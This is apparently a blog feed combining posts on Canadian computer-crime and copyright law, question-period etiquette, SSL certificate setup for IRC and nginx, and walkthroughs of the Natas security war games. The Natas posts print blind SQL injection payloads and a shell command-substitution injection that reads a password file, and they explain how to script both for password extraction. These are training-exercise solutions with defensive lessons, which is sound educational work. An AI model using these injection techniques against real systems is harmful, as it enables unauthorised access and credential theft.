The language "directly or indirectly" in (a) is interesting -- that would seem to include social engineering where you trick someone into accessing a computer system on your behalf. I think that's probably a sensible inclusion.

Subsection (c) is quite broad, as it makes it an offence to use a computer with the intent to commit the offences in (a) or (b), or s 430 (mischief in relation to data). "Essentials of Canadian Law" explains that the rationale here is that the police shouldn't have to wait for actual harm to occur. So, this is like murder vs attempted murder, except the punishment is the same for both. That seems wrong -- we differentiate between murder and attempted murder in the Criminal Code, and sentence those convicted of these offences differently. Another potential issue: this section inherits all the problematic breadth of mischief in relation to data, which I talked about last time.

Exploring Canada's computer crime laws: Part 2 https://hashbang.ca/2013/11/05/exploring-canadas-computer-crime-laws-part-2 Tue, 05 Nov 2013 19:10:04 +0000 http://hashbang.ca/?p=1773 Since the exceptions in copyright law for encryption and security research don't apply if you're doing anything criminal, I next looked at the Criminal Code [PDF].

Mischief in relation to data

This is a digital counterpart to the mischief offence against physical property.

Mischief in relation to data


(1.1) Every one commits mischief who wilfully

(a) destroys or alters data;

(b) renders data meaningless, useless or ineffective;

(c) obstructs, interrupts or interferes with the lawful use of data; or

(d) obstructs, interrupts or interferes with any person in the lawful use of data or denies access to data to any person who is entitled to access thereto.


(2) Every one who commits mischief that causes actual danger to life is guilty of an indictable offence and liable to imprisonment for life.


(4) Every one who commits mischief in relation to property, other than property described in subsection (3),

(a) is guilty of an indictable offence and liable to imprisonment for a term not exceeding two years; or

(b) is guilty of an offence punishable on summary conviction.

(5) Every one who commits mischief in relation to data

(a) is guilty of an indictable offence and liable to imprisonment for a term not exceeding ten years; or

(b) is guilty of an offence punishable on summary conviction.

A strict reading of s 430(1.1)(a) means that altering data is illegal, but s 429(3) provides that it is not a crime to destroy anything if you own it, so long as you are not attempting fraud. (So, you can't burn down your house in an attempt to defraud your insurance company)

s 430(1.1)(c) and (d) seem to apply fairly straightforwardly to DDoS attacks. Researchers like Molly Sauter are developing an understanding of at least some DDoS actions as legitimate political activity. Equating what we might understand as a digital sit-in with destructive computer crime is a serious category error. While civil disobedience in the physical realm is a crime, there is a large and widening gulf between the consequences for civil disobedience online and off, which I believe is fundamentally unjust.

s 430(2) provides for life in prison if your mischief causes actual danger to life. So, if you break into the computer systems controlling the power grid and wreak havoc, you might not see the light of day once convicted. It would be interesting to know how courts have judged the "actual danger to life" standard.

I included s 430(4) because it doesn't apply to mischief in relation to data: "property" is defined as "real or personal corporeal property." Note the dollar-value requirement (via the reference to subsection (3)), which is missing from s 430(5). The US CFAA had a $5000 requirement for the felony enhancement, which is already a laughably low bar, but the comparable statute in Canada has no bar at all. (I believe this felony enhancement was amended in 2008, but it isn't clear that the new requirements are much better.)

Given the abuses of the CFAA we've seen, the lack of any real-damage requirement should be disturbing. There should be a minimum monetary threshold here before punishment kicks in -- and it should count real damages. The EFF's legal director Cindy Cohn gave a good explanation of how the CFAA counts up the $5000 of damages at DEF CON 11 -- we shouldn't make that same mistake.

Exploring Canada's computer crime laws: Part 1 https://hashbang.ca/2013/11/04/exploring-canadas-computer-crime-laws-part-1 Mon, 04 Nov 2013 19:10:54 +0000 http://hashbang.ca/?p=1737 As someone with an interest in technology, security, and the legal issues surrounding them, I often watch relevant legal cases with interest. Typically, those cases come from the United States. The CFAA has been in the news frequently of late, and not always in a good light. I was pleased to see Zoe Lofgren's proposed changes, which try to make the law less draconian.

This is typical for Canada -- we often see more about American news on topics like this than Canadian. I realized that I really didn't know what the law in Canada said about so-called computer crimes, although I've often wondered. A while back, I took an afternoon to do some reading. I was not happy when that afternoon ended. This is part one of a three-part series on what I found.

Nothing in this series of posts should be regarded as definitive. I'm not a lawyer, nor even a law student. I'm a computer science student with an amateur interest in the law.

Copyright Act

I started with the recent amendments to Canada's copyright law [PDF] because I knew from Kevin McArthur that it had implications for security research in Canada. He was right. There are two provisions which make computer security research difficult in Canada.

Encryption research

First, there are exceptions for encryption research.

Encryption research

30.62 (1) Subject to subsections (2) and (3), it is not an infringement of copyright for a person to reproduce a work or other subject-matter for the purposes of encryption research if

(a) it would not be practical to carry out the research without making the copy;

(b) the person has lawfully obtained the work or other subject-matter; and

(c) the person has informed the owner of the copyright in the work or other subject-matter.


(2) Subsection (1) does not apply if the person uses or discloses information obtained through the research to commit an act that is an offence under the Criminal Code.

Limitation  — computer program

(3) Subsection (1) applies with respect to a computer program only if, in the event that the research reveals a vulnerability or a security flaw in the program and the person intends to make the vulnerability or security flaw public, the person gives adequate notice of the vulnerability or security flaw and of their intention to the owner of copyright in the program. However, the person need not give that adequate notice if, in the circumstances, the public interest in having the vulnerability or security flaw made public without adequate notice outweighs the owner’s interest in receiving that notice.

The idea here is a good one -- nobody should be prevented from doing research on encryption because of copyright law. However, you might have noticed a few troubling requirements.

First, s 30.62(1)(c) requires that you've informed the copyright owner. This assumes that the copyright owner is known, and that you can contact them. Just how would you contact the copyright owner of GnuPG, for example? Do you have to contact all of them? Why should contacting them be mandatory? Requiring researchers to inform the copyright holder, thus probably identifying themselves, opens them to retribution. This is a well-known anti-pattern in security research, so it's not clear why copyright law should privilege business at the expense of security researchers (and thus, indirectly, the public).

Second, s 30.62(2) means that the exception doesn't apply if you "use or disclose" information obtained by doing your research in order to commit any crime. But if you've committed a crime, shouldn't that be sufficient? Why do we need an additional layer of illegality (the copyright infringement)? With this provision, whether or not your behaviour constitutes copyright infringement depends on the contents of another law -- and given the vagueness in the Criminal Code, that's a problem.

Third, s 30.62(3) requires a particular form of "responsible disclosure" -- something which I doubt belongs in law. Here again, there is a requirement to contact the copyright holder, but in this case it makes even less sense than in s 30.62(1)(c), because the copyright holder is not who you want to notify when doing "responsible disclosure." You actually want to notify the software maintainer (if any). That might be the same as the copyright holder, but it might not, and the law doesn't know the difference. This suggests that the drafters don't really understand the subject matter. At least there's a public interest exception -- but without any guidance as to how to weigh the different considerations, what factors might be relevant, or anything of the sort. It would be very interesting to see how courts interpret the relative weighting of interests, but until that's done, business will have very wide latitude to use this vagueness to come down harshly on researchers who embarrass them by exposing security weaknesses.

Security research

There are similar exceptions for security research in s 30.63.

30.63 (1) Subject to subsections (2) and (3), it is not an infringement of copyright for a person to reproduce a work or other subject-matter for the sole purpose, with the consent of the owner or administrator of a computer, computer system or computer network, of assessing the vulnerability of the computer, system or network or of correcting any security flaws.


(2) Subsection (1) does not apply if the person uses or discloses information obtained through the assessment or correction to commit an act that is an offence under the Criminal Code.

Limitation  — computer program

(3) Subsection (1) applies with respect to a computer program only if, in the event that the assessment or correction reveals a vulnerability or a security flaw in the program and the person intends to make the vulnerability or security flaw public, the person gives adequate notice of the vulnerability or security flaw and of their intention to the owner of copyright in the program. However, the person need not give that adequate notice if, in the circumstances, the public interest in having the vulnerability or security flaw made public without adequate notice outweighs the owner’s interest in receiving that notice.

The problems here are similar. Although there's no requirement like s 30.62(1)(c) to notify the copyright holder, there is still a confused "responsible disclosure" requirement. There's no clear reason why "responsible disclosure" should be a requirement in law, much less in copyright law.

There's an even more stringent requirement here though - the owner or administrator of the computer system must consent to the research. This is effectively a prior restraint, and protects business from unwanted criticism. This endangers the public by creating a hostile legal environment for computer security researchers. Again, business is privileged over the safety of the Canadian public.

How to run a question period https://hashbang.ca/2013/09/26/how-to-run-a-question-period Thu, 26 Sep 2013 18:10:41 +0000 https://hashbang.ca/?p=1889 Many different kinds of events involve a presenter giving a speech, and often taking questions. Unfortunately, question periods are often a problem -- for both the presenter and the audience. Here are some thoughts on making it better.

Informal presentations

Sometimes presentations are informal, like at a local users' group, or speaking to co-workers. Questions might be asked during the main presentation, often in an interactive way, with back-and-forth between the speaker and the questioner. This works best with smaller audiences.

In these kinds of situations, it is acceptable and expected that questions will be for clarification. One of the main purposes of these talks is to teach the audience, so thorough understanding is an important goal.

That's why it is usually best to allow and encourage interruptions during your presentation. I try to make a point of mentioning this at the beginning of a talk. The audience might otherwise hold their questions until the end, and miss out on everything between when the question arose and the end of the talk. By making it clear that interruptions are okay, you give the audience permission to ask, and you'll often find that they take you up on the offer. This also leads to highly relevant questions: everyone is on the same page, and the question is tightly related to what you were just talking about.

As a presenter, you might also include a few spots in your notes where you stop to check that the audience is following. This can often elicit useful questions.

Formal presentations

More formal events often involve a dedicated period at the end of the talk for questions, and might be coordinated by a moderator. This also includes large audiences, like large first-year undergraduate lectures. These kinds of presentations don't work well if everyone feels entitled to interrupt the speaker with their question, but I've seen even lecture halls of 500 students with questions in the middle work well. There is absolutely a question of balance. The speaker should inform the audience what that balance is.

When taking questions, you should announce that you will take questions, and then speak for a minute or two longer. You might repeat your conclusion, condensed even further, or suggest topics that might be interesting for the audience to ask about. For example, many speakers will gloss over some tangential topic, saying "We can come back to that later" or "Ask me about that if it interests you." Remind the audience what those were as an invitation to bring up those topics.

This also gives questioners a chance to think about what their best question is, and avoids the dreaded 30 seconds of silence after "So! Who has a question?" That silence is awkward for the presenter, who might be thinking they bored or lost the audience, as well as for the audience, who might like to ask a question but are suddenly put on the spot.

Rules for question period

You can also use that time to remind the audience how a question period works. This is especially useful if you have a moderator.

  • Questions should be high quality. Simply reminding the audience that there is a limited amount of time (specify how long) and that we want good questions will raise the quality significantly.
  • Questions are interrogatory sentences designed to elicit a meaningful response from the speaker. If the event is a panel discussion, every member of the panel should be able to respond to the question.
  • Questions should ideally have an answer that is interesting to a large part of the audience. The other people in the lecture hall are not there for you, so don't waste their time asking about something personal, or grinding an axe. If things get really tangential, the moderator should simply cut off the question or answer and move on to the next question.
  • Questions should be short -- no more than five sentences. If you reach the fourth sentence and haven't reached the question mark, then your fifth sentence must be "What do you think of that?" or "Can you tell us more about that?" or something similar.
  • You only get one comeback. This is not the debating society; you have asked for the speaker's answer to a question.

As a moderator, you should take a minute or two at the beginning of the question period to remind the audience of these things (it really only takes 90 seconds, honest, and you'll save time by getting shorter questions).

You should also consider finding your next questioner during the answer to the previous question. Just like the 2-minute warning that the question period is coming up, this allows the next questioner to formulate their words before being put on the spot. Even a 30-second head start can make a big difference. It also keeps potential questioners from vying for the next slot and delaying the actual question. "Me?" "Me?" "Who, her?" gets old within two seconds, so avoid it altogether by picking the next questioner during the previous answer.

Finally, never take more than one question at a time. I've seen moderators try a "lightning round" where they empty out the queue to get a bunch of questions on the floor, and ask the speaker or panel to respond to whatever they feel like. It just doesn't work. Neither does taking multiple questions in succession and then having the speaker answer them in succession: now we're testing the speaker's memory of the questions, or making them take notes. It also eliminates any possibility of follow-up questions, or of letting the audience craft questions that build on earlier questions and answers. It's just a bad idea -- take one question at a time.

Written questions

I haven't yet addressed question periods where questions are written down on cards and read out by the moderator.

I find the experience of listening to people read others' handwriting aloud to be painful. I feel embarrassed on behalf of the person who has to decipher some audience member's chicken scratch (remember, they were probably writing on their knee, hurriedly). Having all the questions come from the moderator can help the quality some, but I think something is lost by having an intermediary between the questioner and the speaker.

If you have useful advice for doing written questions, the comments section welcomes you.


These are some of my rules for formal question-and-answer periods.

Speakers & Moderators:

  • Let the audience know when you want to take questions (during/after).
  • Remind the audience about their responsibilities when asking questions (see below).
  • Give a 2-minute warning that question period is coming.
  • If your presentation is supposed to teach the audience, build in comprehension checks, which can also elicit high quality questions.
  • Moderators should try to find the next question during the previous answer.


Questioners:

  • Respect the speaker's preference for when questions should be asked.
  • Questions should be high quality. Think before spending one of the few questions that fit into the allotted time.
  • Questions should be things the speaker can respond to meaningfully, and the answer should be interesting to everyone in the audience.
  • Questions should actually be questions, and they should be short. If you get stuck, "What do you think about that?" turns a soliloquy into a question.
  • One comeback, period.
Validating SSL certificates for IRC bouncers https://hashbang.ca/2013/09/14/validating-ssl-certificates-for-irc-bouncers https://hashbang.ca/2013/09/14/validating-ssl-certificates-for-irc-bouncers#comments Sat, 14 Sep 2013 13:28:22 +0000 http://hashbang.ca/?p=1868 IRC bouncers are sort of like a proxy. Your bouncer stays online, connected to IRC, all the time, and then you connect to the bouncer using a normal IRC client. I connect to my bouncer with an SSL-encrypted connection, but I hadn't been validating the certificate until now. Validating the SSL certificate is critical for thwarting man-in-the-middle (MITM) attacks.

In a MITM attack, the victim connects to the attacker, thinking it is the service they want to talk to (the IRC bouncer in this case). The attacker then forwards the connection to the service. Both connections might use SSL, but in the middle, the attacker can see the plaintext. They can simply eavesdrop, or modify the data flowing in both directions. SSL is supposed to prevent that, but if you don't validate the certificate, then you don't know who you're talking to. I want to know I'm really talking to my IRC bouncer, so let's figure out how to validate that certificate.

Configure the bouncer

First, configure your bouncer to listen for SSL connections. With ZNC, you do that by setting SSL = true for the listener.
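In the config file, that's a single option inside the listener block. A sketch of what ~/.znc/configs/znc.conf might contain (the listener name and port are illustrative, and exact options vary by ZNC version):

```
<Listener listener0>
        IPv4 = true
        IPv6 = true
        Port = 6697
        SSL = true
</Listener>
```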

Generate a certificate

Then, generate a certificate for your bouncer. ZNC makes this easy by providing a znc --makepem command (PEM is the file format for this certificate).

$ znc --makepem
[ ok ] Writing Pem file [/home/mike/.znc/znc.pem]... 

This will be a self-signed certificate -- rather than being signed by a trusted certificate authority (CA) -- so verification will fail. Until now, I had been configuring my IRC client to allow invalid SSL certificates, but we can do better than that. We can trust this SSL certificate, rather than requiring a CA as a trust anchor. This means that if the certificate ever changes in the future, we'll need to configure trust for that new certificate.

Obtain the certificate

Obtain the SSL certificate securely. ZNC gave me the filename of the certificate it wrote earlier, so cat /home/mike/.znc/znc.pem shows me the certificate. You can transfer the file to the computer where your IRC client will run using scp or rsync or something.

Alternatively, you could download the certificate from your server:

openssl s_client -showcerts -connect localhost:6697
depth=0 C = US, ST = SomeState, L = SomeCity, O = SomeCompany, OU = mike, CN = host.unknown, emailAddress = mike@host.unknown
verify error:num=18:self signed certificate
verify return:1
depth=0 C = US, ST = SomeState, L = SomeCity, O = SomeCompany, OU = mike, CN = host.unknown, emailAddress = mike@host.unknown
verify return:1
Certificate chain
 0 s:/C=US/ST=SomeState/L=SomeCity/O=SomeCompany/OU=mike/CN=host.unknown/emailAddress=mike@host.unknown


    Start Time: 1379111327
    Timeout   : 300 (sec)
    Verify return code: 18 (self signed certificate)

Press CTRL-D to send EOF, and terminate the connection.

Notice I did this from localhost so I can be sure of what I'm connecting to. Doing this remotely means you're doing a kind of trust-on-first-use (TOFU; aka trust-upon-first-use -- TUFU).

The BEGIN CERTIFICATE and END CERTIFICATE lines show you where the certificate is. Simply copy that block of text (including the begin/end lines).
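If you'd rather not copy by hand, the same extraction can be scripted. A sketch (the throwaway key and certificate generated here stand in for the real ~/.znc/znc.pem, so the commands are runnable anywhere):

```shell
# znc.pem bundles the private key and the certificate in one file;
# simulate one with a throwaway self-signed pair
openssl req -x509 -newkey rsa:2048 -nodes -keyout /tmp/key.pem \
    -out /tmp/cert.pem -days 1 -subj "/CN=host.unknown" 2>/dev/null
cat /tmp/key.pem /tmp/cert.pem > /tmp/znc.pem

# Keep only the certificate block, including the BEGIN/END lines
sed -n '/BEGIN CERTIFICATE/,/END CERTIFICATE/p' /tmp/znc.pem > /tmp/znc.crt
head -n 1 /tmp/znc.crt
```

The last command should print -----BEGIN CERTIFICATE-----, confirming the extraction worked.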

Trust the certificate

Now, we need to add it to the OS certificate store. For Debian-based systems like mine, that means creating a new file like /usr/share/ca-certificates/znc/znc.crt (note the new file extension). Simply copy the certificate to that filename, or use a text editor to create it and paste in the text of the certificate.

Now, we need to regenerate the certificate store. Debian systems allow you to do this automatically:

sudo dpkg-reconfigure ca-certificates

This brings up an interactive ncurses program that explains what will happen. You can either let the script add all the new certificates it found in the ca-certificates directory, or have it ask you about each one.

(Screenshot: the ca-certificates configuration dialog -- select to be prompted for which certificate authorities to trust.)

If you have it ask you, it'll show a list of the certificates found, and the ones that are already trusted are marked with a star. You should be able to scroll through the list and find the un-starred certificate that you added. Use the spacebar to add/remove a star.

(Screenshot: the ca-certificates configuration dialog -- select the CA certificates you want to trust.)

Hit OK, and the program goes away to do your bidding:

Processing triggers for ca-certificates ...
Updating certificates in /etc/ssl/certs...
1 added, 0 removed; done.
Running hooks in /etc/ca-certificates/update.d....
Adding debian:znc.pem
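If you'd rather skip the interactive dialog, the same result can be had non-interactively on Debian-based systems. A sketch (using the znc/znc.crt path from above; the path added to the config file is relative to /usr/share/ca-certificates):

```shell
# Mark the new certificate as trusted, then rebuild /etc/ssl/certs
echo "znc/znc.crt" | sudo tee -a /etc/ca-certificates.conf
sudo update-ca-certificates
```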

DANE support

A superior method of allowing validation of SSL certificates for IRC is to use DNS-based Authentication of Named Entities (DANE). See Alexander Færøy's post for discussion about that proposal, and information about implementation of DANE in the irssi IRC client.


SSL can provide security to more than just HTTP, and is commonly used to secure IRC connections. However, most people don't have CA-signed certificates for that, because IRC isn't high-value the way HTTP is. Nevertheless, we can explicitly trust the self-signed certificate by adding it to the OS certificate store.

Now you can configure your IRC client to validate the certificate, and it will be considered valid despite being self-signed. This protects you from MITM attacks, because your client can require a valid certificate.

Introducing Hack::Natas https://hashbang.ca/2013/08/18/introducing-hacknatas https://hashbang.ca/2013/08/18/introducing-hacknatas#comments Sun, 18 Aug 2013 18:23:44 +0000 http://hashbang.ca/?p=1826 Last Monday, I presented my solutions to the Natas server-side security war games at NSLUG. Afterwards, I spent some time to clean up my code, and I've now published it to CPAN as Hack::Natas, which comes with modules and scripts to solve level 15 and 16 in an automated way, plus walkthroughs for all the levels up to 17 written in Markdown (those are almost the same as my blog posts, so you're not missing out by looking at only one or the other).


First, I added an optimization that was suggested during my talk. In level 15, I made a common mistake with STRCMP in MySQL: it's a case-insensitive comparison, and I needed to add BINARY to make it respect case. However, this opens the door to a simple optimization. You can nearly halve the search space by checking only lower-case letters, using a case-insensitive comparison. Once you've found the right letter, a single case-sensitive search finds the right case.
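Here's a minimal sketch of that optimization (in Python rather than Perl). The oracle here is a local stand-in with a hypothetical secret; in the real attack it's an HTTP request whose injected SQL uses STRCMP for the case-insensitive probe and BINARY STRCMP for the case-sensitive one:

```python
import string

SECRET = "aB3x"  # hypothetical stand-in for the target password

def oracle(prefix, case_sensitive):
    """Stand-in for the HTTP request: does the password start with `prefix`?"""
    if case_sensitive:
        return SECRET.startswith(prefix)
    return SECRET.lower().startswith(prefix.lower())

def next_char(known):
    # Phase 1: case-insensitive scan over lower-case letters and digits only,
    # nearly halving the per-character search space.
    for c in string.ascii_lowercase + string.digits:
        if oracle(known + c, case_sensitive=False):
            # Phase 2: one case-sensitive probe settles the letter's case.
            if c.isalpha() and oracle(known + c.upper(), case_sensitive=True):
                return c.upper()
            return c
    raise ValueError("no candidate matched")

found = ""
for _ in range(len(SECRET)):
    found += next_char(found)
```

Instead of probing roughly 62 candidates per position (a-z, A-Z, 0-9), this probes at most 36, plus one extra request per letter to fix the case.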


Next, I refactored the code into modules using Moo and Type::Tiny. I wanted to use Moo for the quick startup time it offers in comparison to Moose. I wanted to use Type::Tiny because it's new and fancy, and seems to offer the features I typically want for type constraints. These both fit the bill quite well.

I factored out common code into two roles. Hack::Natas contains the most generic attributes and code that would be needed when adding new levels: the username and password to access the current level, and an HTTP::Tiny object to do requests, for example. The next role is common to the two levels that are currently implemented. Both level 15 and 16 require you to guess each one-character slice of the password, so this role holds the password_so_far attribute and a run method which does the search using an API it defines with requires. Then, the classes for levels 15 and 16 consume those roles and implement the required methods. I'm not sure this is the most sensible design to use, but it seems to suit for now.
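The shape of that design -- a shared run method driving level-specific required methods -- is a template method. A rough analogue in Python (the class and method names here are illustrative, not the module's actual API):

```python
from abc import ABC, abstractmethod

class PasswordSearch(ABC):
    """Analogue of the shared role: `run` does the generic
    character-by-character search, relying on methods each level supplies."""

    def __init__(self):
        self.password_so_far = ""

    @abstractmethod
    def password_length(self):
        ...

    @abstractmethod
    def guess_is_correct(self, guess):
        """Ask the server whether the password starts with `guess`."""
        ...

    def run(self, alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
        # Generic search loop shared by both levels.
        while len(self.password_so_far) < self.password_length():
            for c in alphabet:
                if self.guess_is_correct(self.password_so_far + c):
                    self.password_so_far += c
                    break
        return self.password_so_far
```

Each level then only has to implement its own oracle (SQL injection for 15, command injection for 16) and the shared loop does the rest.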

Demo on ascii.io

In the past couple of days, I also discovered ascii.io, a command-line program and web service for making no-fuss terminal recordings and sharing them via an in-browser JS terminal emulator. It's pretty cool -- I uploaded a demo of my script for level 15.

Presenting my Natas solutions at NSLUG
https://hashbang.ca/2013/08/18/presenting-my-natas-solutions-at-nslug
Sun, 18 Aug 2013 11:12:06 +0000

Last Monday, I presented my solutions to the Natas server-side security war games at my local Linux users' group.

I recorded my talk, but it didn't turn out well. I was using Google Hangouts for the first time, and I forgot that it only records the windows you tell it to. In the video, embedded below the fold, there's a lot of talking about windows that were being projected, but which didn't get recorded. Still, the audio counts for something, and you can see what I'm talking about much of the time.

SSL configuration on nginx
https://hashbang.ca/2013/08/05/ssl-configuration-on-nginx
Mon, 05 Aug 2013 13:08:50 +0000

This SSL configuration for nginx achieves an A on the SSL Labs tool. It's what this server currently uses.

We disable older, insecure versions of SSL, allowing only TLSv1 and newer:

ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

(Previously, I included SSLv3, but it looks like that's no longer required.)

For a bit of a performance boost, we can cache SSL sessions:

ssl_session_cache shared:SSL:5m;
ssl_session_timeout 10m;

This is potentially problematic, because session resumption data could be compromised. Adam Langley gives a good overview of this.

Perhaps the most important part is the cipher suite. It brings ciphers that offer forward secrecy, and which are resistant to the BEAST attack, to the top. SSL compression is already disabled by default to block the CRIME attack, so there is nothing in the server configuration for that.

ssl_prefer_server_ciphers on;

That cipher suite string is cobbled together based on advice from Remy van Elst, Jacob Appelbaum's duraconf project, an attempt to copy what Google does, and probably other sources. (Which suggests that configuring an appropriate cipher suite is much too difficult.)

We also want to make it easy for clients to verify our certificate's validity with OCSP. We can set the resolver to enable that, but we can also send a signed OCSP response ourselves, to save the client an extra network round-trip.

ssl_stapling on;
resolver ...;
ssl_stapling_verify on;
ssl_stapling_file ssl/ocsp.der;

Finally, to encourage the use of SSL, I've added the Strict-Transport-Security header. HSTS aims to mitigate SSL stripping attacks (first demonstrated by Moxie Marlinspike). The HSTS header tells clients which support this standard to only connect to the site over HTTPS for the next little while. (max-age is given in seconds; 31536000 seconds == 12 months, and the countdown is restarted every time the client sees the header, so "the next little while" can effectively be forever.) This server configuration allows clients to connect with HTTPS or HTTP. If you don't use encryption, you'll still be sent this header. However, clients ignore it unless it was received via HTTPS. So, in this configuration, once you connect over SSL, your client should stick to SSL.

add_header Strict-Transport-Security "max-age=31536000";
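To make the client-side behaviour concrete, here's a toy model in Python of how a browser tracks the HSTS pin. This is a simplification of what the standard actually requires (it ignores includeSubDomains, preload lists, and max-age=0 eviction):

```python
import re
import time

hsts_until = 0.0  # epoch seconds until which HTTPS is mandatory; 0 = no pin

def see_response(over_https, sts_header):
    """Update HSTS state after seeing a response."""
    global hsts_until
    if not over_https or sts_header is None:
        return  # the header is ignored unless it arrived over HTTPS
    m = re.search(r"max-age=(\d+)", sts_header)
    if m:
        # the countdown restarts every time the header is seen
        hsts_until = time.time() + int(m.group(1))

def must_use_https():
    return time.time() < hsts_until
```

This is why the mixed HTTP/HTTPS configuration above is safe: a header seen over plain HTTP changes nothing, but once the client sees it over HTTPS, the pin sticks (and keeps renewing) for the max-age window.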
Server-side security war games: Part 16
https://hashbang.ca/2013/07/09/natas-16
Tue, 09 Jul 2013 11:48:18 +0000

This is the last level. We're challenged with an improved version of level 9 -- they've added additional "sanitation" to keep us out.

    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");
    }

Okay, so we have to deal with two levels of escaping here:

  1. We can't use semicolon, pipe, ampersand, backtick, single-quote, or double-quote
  2. $key is now double-quoted

There are still some tricks we can use. For example, we can still use command substitution ($()). I found this level very tricky, until I thought carefully about how to make that work for me. In particular, I needed to do a character-by-character guess/search, just like with the SQL injection attack in level 15.

Here's the strategy. We want to get a boolean response for whether we guessed one character of the password correctly. Let's use a word we know is in the dictionary to turn this search into a boolean response. If we grep for "hacker" in dictionary.txt, then it shows up. If we can make the command grep for "0hacker" on the other hand, it doesn't show up, as that's not a word in the dictionary. So, we can use that 0 to do a search. As with the blind SQL injection attack previously, we'll go character-by-character.

We can inject $(grep -E ^%s /etc/natas_webpass/natas17)hacker. If the password in /etc/natas_webpass/natas17 starts with the prefix we picked, the inner grep outputs the matching line, so the outer command greps the dictionary for "<password>hacker", which won't be found, and we see no output. If our guess is wrong, the inner grep outputs nothing, the outer command greps for plain "hacker", and it shows up. So: seeing "hacker" in the output means we guessed the wrong letter; seeing nothing means we guessed the right character. Simply iterate through the alphabet for each of the 32 characters in the password, and you can recover the whole thing.
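Here's a runnable sketch of that search, with local stand-ins for the two greps. The secret, the dictionary, and the function names are all hypothetical; in the real attack, guessed_right would be an HTTP request to the level-16 page:

```python
import string

SECRET = "hAckMe42"       # hypothetical stand-in for natas17's password
DICTIONARY = {"hacker"}   # one word we know is in dictionary.txt

def inner_grep(prefix):
    # $(grep -E ^<prefix> /etc/natas_webpass/natas17): the matching line
    # (the whole password) when the prefix is right, otherwise nothing.
    return SECRET if SECRET.startswith(prefix) else ""

def outer_grep(needle):
    # grep -i "<needle>" dictionary.txt: output iff the needle is a known word.
    return needle if needle.lower() in DICTIONARY else ""

def guessed_right(prefix):
    # We inject: $(grep -E ^<prefix> /etc/natas_webpass/natas17)hacker
    # Correct prefix -> needle is "<password>hacker" -> no output.
    # Wrong prefix   -> needle is plain "hacker"     -> output.
    return outer_grep(inner_grep(prefix) + "hacker") == ""

found = ""
while len(found) < len(SECRET):
    for c in string.ascii_letters + string.digits:
        if guessed_right(found + c):
            found += c
            break
```

The boolean oracle is exactly the "hacker"/no-output distinction described above; everything else is the same prefix-extension loop as the blind SQL injection in level 15.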

As with the previous level, provide the right password as the first argument on the command line when running natas16.pl to do this search automatically:

View the code on Gist.

Level 17

You can log in to verify you got the right password, but there's nothing further. You won!

Lessons learned

As with level 15, a seemingly-limited opportunity for command injection turned out to be fatal. Don't be injectable. For SQL, use parameterized queries. For system commands, be sure your invocation doesn't involve the shell, and whitelist acceptable input rather than blacklist.
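As an example of that advice (a sketch in Python of the safe pattern, not the code the level actually uses), the vulnerable passthru call could be replaced with an argv-style invocation plus a whitelist:

```python
import re
import subprocess

def safe_grep(key, path="dictionary.txt"):
    # Whitelist what's acceptable instead of blacklisting bad characters.
    if not re.fullmatch(r"[A-Za-z0-9]+", key):
        raise ValueError("illegal search term")
    # argv-style invocation: no shell is involved, so quoting tricks and
    # $(...) command substitution inside `key` have no effect.
    result = subprocess.run(
        ["grep", "-i", "--", key, path],
        capture_output=True, text=True,
    )
    return result.stdout
```

Either defence alone would have stopped this level's attack; together they give defence in depth.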

If you enjoyed this walkthrough, let me know in the comments! I'd love to hear about your alternative approaches. overthewire.org has a bunch more war games. If server-side security isn't your thing, take a look at what else is available.

Server-side security war games: Part 15
https://hashbang.ca/2013/07/06/natas-15
Sat, 06 Jul 2013 13:33:50 +0000

We're nearly at the end! This is the 2nd-last level.

We know there is a users table, with columns "username" and "password". This time, the code just checks that the username exists. There's no way to print out the data we want. Instead, we'll have to do something cleverer.

First, we can deduce that the password we want belongs to the natas16 user. Check your assumption -- does that user exist? Yes. Good.

We can still guess parts of the data we need. We'll first guess the length of the password (it is probably 32 chars, like the others, but let's make sure). Then, we can guess one character at a time.

To guess the length, inject natas16" AND LENGTH(password) = %d #

We already know the first part of that AND is true, so now the second part is all we care about. When it is false, the whole thing is false, and the webpage will say "This user doesn't exist". When it is true, the whole thing is true, a single database row will be returned, and the webpage will say "This user exists".

Increment %d until the result is true. (Yes, the password is 32 chars.)

Now, do the same thing for one-character slices of the password:

natas16" AND STRCMP(
    SUBSTR(password, %d, 1),
    "%s"
) = 0 #

There's an error here that will cause your discovered password to contain only upper-case letters, or only lower-case letters (depending on how you do your search). The comparison is case-insensitive under MySQL's default collation, so to coerce it into case-sensitivity, use BINARY on the operand:

natas16" AND STRCMP(
    BINARY(SUBSTR(password, %d, 1)),
    "%s"
) = 0 #

As with the length, increment %s along the alphabet (a..z, A..Z, 0..9) until it returns true, then increment %d and do it again.
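The whole loop can be sketched compactly (in Python; user_exists stands in for the HTTP request that checks for "This user exists" in the response):

```python
# Injected username templates, filled in with % formatting.
LENGTH_PROBE = 'natas16" AND LENGTH(password) = %d #'
CHAR_PROBE = 'natas16" AND STRCMP(BINARY(SUBSTR(password, %d, 1)), "%s") = 0 #'
ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

def find_password(user_exists, max_len=64):
    """user_exists(username) -> bool is the boolean oracle."""
    # First guess the length...
    length = next(n for n in range(1, max_len + 1)
                  if user_exists(LENGTH_PROBE % n))
    # ...then guess one character at a time (SUBSTR is 1-indexed).
    password = ""
    for pos in range(1, length + 1):
        password += next(c for c in ALPHABET
                         if user_exists(CHAR_PROBE % (pos, c)))
    return password
```

At roughly 62 requests per character, recovering a 32-character password takes on the order of 2000 requests, which is entirely practical.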

You'll want to script that. I tried using sqlmap, an open-source tool for exploiting SQL injection, but I couldn't get it to work; it kept inexplicably getting HTTP 401 (let me know what I did wrong in the comments). In the end, writing my own script was faster, and it made sure I understood exactly how the attack works. The natas15.pl script below does that for you. Simply provide the appropriate password as the first argument on the command line.

View the code on Gist.

Here's a demo of (a later version of) the script running:

I really enjoyed this level. The trial-and-error to figure out what SQL would be useful to inject was fun, and I learned a lot. I hope you did too. See you next time, for level 16.

Lessons learned

What seemed like a fairly limited opportunity for SQL injection turned out to be completely fatal. Don't be injectable.

Server-side security war games: Part 14
https://hashbang.ca/2013/07/04/natas-14
Thu, 04 Jul 2013 14:06:29 +0000

In level 14, we see a more traditional username & password form. Let's check the source code to see if there are holes we can slip through.

    if(array_key_exists("username", $_REQUEST)) {
